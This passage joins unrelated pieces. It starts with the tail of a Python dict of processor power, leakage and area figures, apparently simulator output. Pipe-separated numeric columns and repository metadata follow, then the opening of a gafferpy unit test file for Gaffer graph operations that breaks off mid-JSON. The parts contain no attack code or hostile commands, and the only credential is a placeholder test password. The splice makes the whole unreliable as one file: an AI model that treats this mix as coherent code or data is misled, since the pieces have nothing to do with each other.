'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.095499,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.70481,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0233442,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.221024,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.132974,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0534981,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.0862904,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0435565,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.183345,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0408007,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.13286,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0251216,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00224395,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0246857,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0165954,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0498073,
'Execution Unit/Register Files/Runtime Dynamic': 0.0188393,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0578433,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.159149,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 0.987734,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 4.47676e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 4.47676e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 3.91457e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 1.52378e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000238394,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000367075,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000423753,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0159536,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.01478,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0390004,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0541855,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.28255,
'Instruction Fetch Unit/Runtime Dynamic': 0.10993,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0420224,
'L2/Runtime Dynamic': 0.0125557,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.91408,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.343009,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0219013,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0219014,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.0175,
'Load Store Unit/Runtime Dynamic': 0.472921,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0540048,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.10801,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0191665,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0197953,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0630956,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00640077,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.252129,
'Memory Management Unit/Runtime Dynamic': 0.026196,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.3165,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0660832,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0032179,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0263098,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0956109,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.70495,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 8.547924110383947,
'Runtime Dynamic': 8.547924110383947,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.455911,
'Runtime Dynamic': 0.177455,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 60.4616,
'Peak Power': 93.5738,
'Runtime Dynamic': 9.51406,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 60.0057,
'Total Cores/Runtime Dynamic': 9.3366,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.455911,
'Total L3s/Runtime Dynamic': 0.177455,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.137856
| 124
| 0.682203
| 8,095
| 68,676
| 5.781717
| 0.067449
| 0.123411
| 0.112813
| 0.093327
| 0.938337
| 0.930432
| 0.918061
| 0.886546
| 0.862338
| 0.842745
| 0
| 0.132551
| 0.22411
| 68,676
| 914
| 125
| 75.137856
| 0.745801
| 0
| 0
| 0.642232
| 0
| 0
| 0.65677
| 0.048051
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4334d1e159afdbc3a801eb83f5e94613b461ca09
| 197,972
|
py
|
Python
|
python-shell/src/test/test_gaffer_operations.py
|
sw96411/gaffer-tools
|
2dd4ff64cf6afa1dd3f9529977d7170370b11f58
|
[
"Apache-2.0"
] | null | null | null |
python-shell/src/test/test_gaffer_operations.py
|
sw96411/gaffer-tools
|
2dd4ff64cf6afa1dd3f9529977d7170370b11f58
|
[
"Apache-2.0"
] | null | null | null |
python-shell/src/test/test_gaffer_operations.py
|
sw96411/gaffer-tools
|
2dd4ff64cf6afa1dd3f9529977d7170370b11f58
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2016-2019 Crown Copyright
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import unittest
from gafferpy import gaffer as g
class GafferOperationsTest(unittest.TestCase):
examples = [
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElements",
"validate" : true,
"skipInvalidElements" : false,
"input" : [ {
"group" : "entity",
"vertex" : 6,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Entity"
}, {
"group" : "edge",
"source" : 5,
"destination" : 6,
"directed" : true,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Edge"
} ]
}
''',
g.AddElements(
skip_invalid_elements=False,
input=[
g.Entity(
vertex=6,
properties={'count': 1},
group="entity"
),
g.Edge(
destination=6,
source=5,
group="edge",
properties={'count': 1},
directed=True
)
],
validate=True
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElementsFromFile",
"filename" : "filename",
"elementGenerator" : "uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator",
"parallelism" : 1,
"validate" : true,
"skipInvalidElements" : false
}
''',
g.AddElementsFromFile(
parallelism=1,
validate=True,
element_generator="uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator",
filename="filename",
skip_invalid_elements=False
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElementsFromKafka",
"topic" : "topic1",
"groupId" : "groupId1",
"bootstrapServers" : [ "hostname1:8080,hostname2:8080" ],
"elementGenerator" : "uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator",
"parallelism" : 1,
"validate" : true,
"skipInvalidElements" : false
}
''',
g.AddElementsFromKafka(
topic="topic1",
parallelism=1,
skip_invalid_elements=False,
validate=True,
bootstrap_servers=[
"hostname1:8080,hostname2:8080"
],
element_generator="uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator",
group_id="groupId1"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElementsFromSocket",
"hostname" : "localhost",
"port" : 8080,
"elementGenerator" : "uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator",
"parallelism" : 1,
"validate" : true,
"skipInvalidElements" : false,
"delimiter" : ","
}
''',
g.AddElementsFromSocket(
validate=True,
element_generator="uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator",
parallelism=1,
delimiter=",",
hostname="localhost",
skip_invalid_elements=False,
port=8080
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.CountGroups"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.CountGroups()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.CountGroups",
"limit" : 5
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.CountGroups(
limit=5
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"key" : "ALL"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToGafferResultCache(),
g.DiscardOutput(),
g.GetGafferResultCacheExport(
key="ALL"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.job.GetJobDetails"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToGafferResultCache(),
g.DiscardOutput(),
g.GetJobDetails()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"jobId" : "0f47bc2a-547d-4990-9104-04a8dd64e588",
"key" : "ALL"
} ]
}
''',
g.OperationChain(
operations=[
g.GetGafferResultCacheExport(
job_id="0f47bc2a-547d-4990-9104-04a8dd64e588",
key="ALL"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache",
"key" : "edges"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache",
"key" : "entities"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.GetExports",
"getExports" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"key" : "edges"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"key" : "entities"
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToGafferResultCache(
key="edges"
),
g.DiscardOutput(),
g.GetAllElements(),
g.ExportToGafferResultCache(
key="entities"
),
g.DiscardOutput(),
g.GetExports(
get_exports=[
g.GetGafferResultCacheExport(
key="edges"
),
g.GetGafferResultCacheExport(
key="entities"
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherAuthorisedGraph",
"graphId" : "graph2"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge"
)
],
entities=[
]
)
),
g.ExportToOtherAuthorisedGraph(
graph_id="graph2"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherAuthorisedGraph",
"graphId" : "newGraphId",
"parentSchemaIds" : [ "schemaId1" ],
"parentStorePropertiesId" : "storePropsId1"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
group="edge"
)
]
)
),
g.ExportToOtherAuthorisedGraph(
parent_schema_ids=[
"schemaId1"
],
graph_id="newGraphId",
parent_store_properties_id="storePropsId1"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherGraph",
"graphId" : "newGraphId"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
group="edge"
)
]
)
),
g.ExportToOtherGraph(
graph_id="newGraphId"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherGraph",
"graphId" : "newGraphId",
"schema" : {
"edges" : {
"edge" : {
"properties" : {
"count" : "int"
},
"groupBy" : [ ],
"directed" : "true",
"source" : "int",
"destination" : "int"
}
},
"entities" : {
"entity" : {
"properties" : {
"count" : "int"
},
"groupBy" : [ ],
"vertex" : "int"
}
},
"types" : {
"int" : {
"aggregateFunction" : {
"class" : "uk.gov.gchq.koryphe.impl.binaryoperator.Sum"
},
"class" : "java.lang.Integer"
},
"true" : {
"validateFunctions" : [ {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsTrue"
} ],
"class" : "java.lang.Boolean"
}
}
},
"storeProperties" : {
"accumulo.instance" : "someInstanceName",
"gaffer.cache.service.class" : "uk.gov.gchq.gaffer.cache.impl.HashMapCacheService",
"accumulo.password" : "password",
"accumulo.zookeepers" : "aZookeeper",
"gaffer.store.class" : "uk.gov.gchq.gaffer.accumulostore.MockAccumuloStore",
"gaffer.store.job.tracker.enabled" : "true",
"gaffer.store.operation.declarations" : "ExportToOtherGraphOperationDeclarations.json",
"gaffer.store.properties.class" : "uk.gov.gchq.gaffer.accumulostore.AccumuloProperties",
"accumulo.user" : "user01"
}
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge"
)
],
entities=[
]
)
),
g.ExportToOtherGraph(
schema={'edges': {
'edge': {'groupBy': [], 'directed': 'true',
'properties': {'count': 'int'},
'destination': 'int', 'source': 'int'}},
'entities': {
'entity': {'groupBy': [], 'vertex': 'int',
'properties': {'count': 'int'}}},
'types': {'true': {'validateFunctions': [{
'class': 'uk.gov.gchq.koryphe.impl.predicate.IsTrue'}],
'class': 'java.lang.Boolean'},
'int': {'aggregateFunction': {
'class': 'uk.gov.gchq.koryphe.impl.binaryoperator.Sum'},
'class': 'java.lang.Integer'}}},
store_properties={
'gaffer.store.job.tracker.enabled': 'true',
'gaffer.cache.service.class': 'uk.gov.gchq.gaffer.cache.impl.HashMapCacheService',
'gaffer.store.properties.class': 'uk.gov.gchq.gaffer.accumulostore.AccumuloProperties',
'accumulo.instance': 'someInstanceName',
'accumulo.zookeepers': 'aZookeeper',
'accumulo.password': 'password',
'gaffer.store.operation.declarations': 'ExportToOtherGraphOperationDeclarations.json',
'accumulo.user': 'user01',
'gaffer.store.class': 'uk.gov.gchq.gaffer.accumulostore.MockAccumuloStore'},
graph_id="newGraphId"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
